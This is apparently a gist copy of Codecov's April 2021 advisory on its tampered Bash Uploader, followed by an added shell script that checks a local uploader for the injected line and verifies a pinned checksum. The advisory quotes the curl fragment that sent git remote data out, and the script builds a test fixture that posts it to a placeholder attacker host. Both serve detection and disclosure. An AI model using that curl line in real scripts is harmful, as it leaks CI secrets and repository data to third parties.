@afirth
Created April 15, 2021 13:20
APRIL 15TH, 2021
Bash Uploader Security Update
Note: If you are in the affected user group, at 6 am PT, Thursday, April 15th, we emailed your email address on file from GitHub / GitLab / Bitbucket and added a notification banner in the Codecov application after you log in.
About the Event
Codecov takes the security of its systems and data very seriously and we have implemented numerous safeguards to protect you. On Thursday, April 1, 2021, we learned that someone had gained unauthorized access to our Bash Uploader script and modified it without our permission. The actor gained access because of an error in Codecov’s Docker image creation process that allowed the actor to extract the credential required to modify our Bash Uploader script.
Immediately upon becoming aware of the issue, Codecov secured and remediated the affected script and began investigating any potential impact on users. A third-party forensic firm has been engaged to assist us in this analysis. We have reported this matter to law enforcement and are fully cooperating with their investigation.
Our investigation has determined that beginning January 31, 2021, there were periodic, unauthorized alterations of our Bash Uploader script by a third party, which enabled them to potentially export information stored in our users' continuous integration (CI) environments. This information was then sent to a third-party server outside of Codecov’s infrastructure.
The Bash Uploader is also used in these related uploaders: the Codecov-actions uploader for GitHub, the Codecov CircleCI Orb, and the Codecov Bitrise Step (together, the “Bash Uploaders”). Therefore, these related uploaders were also impacted by this event.
The altered version of the Bash Uploader script could potentially affect:
Any credentials, tokens, or keys that our customers were passing through their CI runner that would be accessible when the Bash Uploader script was executed.
Any services, datastores, and application code that could be accessed with these credentials, tokens, or keys.
The git remote information of repositories using the Bash Uploaders to upload coverage to Codecov in CI.
Recommended Actions for Affected Users
Because of our commitment to trust and transparency, we have worked diligently to determine the potential impact to our customers and identify customers who may have used the Bash Uploaders during the relevant time periods. For affected users, we have emailed you on April 15th using your email address on file from GitHub / GitLab / Bitbucket, and there is a notification banner after you log in to Codecov.
We strongly recommend affected users immediately re-roll all of their credentials, tokens, or keys located in the environment variables in their CI processes that used one of Codecov’s Bash Uploaders.
You can determine the keys and tokens that are surfaced to your CI environment by running the env command in your CI pipeline. If anything returned from that command is considered private or sensitive, we strongly recommend invalidating the credential and generating a new one. Additionally, we would recommend that you audit the use of these tokens in your system.
Additionally, if you use a locally stored version of a Bash Uploader, you should check that version for the following:
curl -sm 0.5 -d "$(git remote -v)
If this appears anywhere in your locally stored Bash Uploader, you should immediately replace the bash files with the most recent version from https://codecov.io/bash.
If you use a self-hosted (on-premises) version of Codecov, it is very unlikely you are impacted. To be impacted, your CI pipeline would need to be fetching the Bash Uploader from https://codecov.io/bash instead of from your self-hosted Codecov installation. You can verify from where you are fetching the Bash Uploader by looking at your CI pipeline configuration.
If you conducted a checksum comparison before using our Bash Uploaders as part of your CI processes, this issue may not impact you.
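The two checks above (searching a locally stored uploader for the quoted curl fragment, and comparing a checksum before the script is executed) can be combined into one CI pre-flight step. The script below is an added example, not Codecov's code; the sample uploader files it writes are constructed stand-ins, and the pinned hash is derived from the clean copy here only because a real pipeline would hard-code it from a trusted release manifest.

```shell
#!/usr/bin/env bash
# Added example (not Codecov's code): pre-flight checks for a locally stored
# Bash Uploader before CI executes it.
set -u

# The fragment quoted in the advisory, matched as a fixed string (grep -F),
# so the $( ... ) is never expanded.
EXFIL_MARKER='curl -sm 0.5 -d "$(git remote -v)'

# Returns 0 when the marker is absent from the file, 1 when it is present.
uploader_is_clean() {
  ! grep -qF -- "$EXFIL_MARKER" "$1"
}

# Returns 0 when the file's SHA-256 equals the pinned value, 1 otherwise.
# The pin must come from a trusted, out-of-band source (a published
# SHA256SUM for the release), never from the same download being checked.
uploader_matches_pin() {
  local file=$1 expected=$2 actual
  actual=$(sha256sum "$file" | cut -d' ' -f1)
  [ "$actual" = "$expected" ]
}

# Both checks must pass before the uploader is allowed to run.
uploader_preflight() {
  uploader_is_clean "$1" && uploader_matches_pin "$1" "$2"
}

# Constructed fixtures: a clean stand-in for the uploader and a copy with an
# injected line. Neither is the real uploader; the host is a placeholder.
WORKDIR=$(mktemp -d)
trap 'rm -rf "$WORKDIR"' EXIT
CLEAN="$WORKDIR/codecov.sh"
TAMPERED="$WORKDIR/codecov-tampered.sh"
printf '%s\n' '#!/usr/bin/env bash' 'echo "uploading coverage report"' > "$CLEAN"
cp "$CLEAN" "$TAMPERED"
printf '%s\n' 'curl -sm 0.5 -d "$(git remote -v)" http://ATTACKER_HOST_PLACEHOLDER/ || true' >> "$TAMPERED"

# Stand-in for the hard-coded pin of the known-good release.
PIN=$(sha256sum "$CLEAN" | cut -d' ' -f1)

if uploader_preflight "$CLEAN" "$PIN"; then echo "clean copy: OK"; fi
if ! uploader_preflight "$TAMPERED" "$PIN"; then echo "tampered copy: REJECTED"; fi
```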
Actions Taken by Codecov
We have taken a number of steps to address this situation including:
rotating all relevant internal credentials, including the key used to facilitate the modification of the Bash Uploader;
auditing where and how the key was accessible;
setting up monitoring and auditing tools to ensure that this kind of unintended change cannot occur to the Bash Uploader again; and
working with the hosting provider of the third-party server to ensure the malicious webserver was properly decommissioned.
Codecov maintains a variety of information security policies, procedures, practices, and controls. We continually monitor our network and systems for unusual activity, but Codecov, like any other company, is not immune to this type of event. We are also working to further enhance security so we can stay ahead of this type of activity, including reinforcing our security tools, policies, and procedures.
We will continue to share with you as much information as we are able and encourage you to reach out to us with any questions or concerns you have at security@codecov.io.
We value the trust you place in us and our solutions and pledge to continuously work to earn it. We regret any inconvenience this may cause and are committed to minimizing any potential impact on you, our users and customers.
Sincerely,
Jerrod Engelberg
CEO, Codecov
FAQs
What is the Codecov Bash Uploader?
How did Codecov learn of this event?
When did this event occur?
Who was responsible for this event?
What types of information was accessed during this event?
Have you notified the appropriate authorities?
Why did you not disclose this event sooner?
I didn’t receive a communication from Codecov. Was I not affected?
How do I know if I was impacted by this event?
Do I need to take action if I was impacted?
How do I know what environment variables of mine may have been available to the actor?
I have multiple repositories using Codecov. How do I know which repositories were affected?
How does Codecov plan to support us in regard to this event?
Is it safe to use Codecov systems and services?
I use Codecov’s self-hosted / on-prem offering, could I be impacted?
How have you addressed the event and what steps have you taken to ensure it will not occur again?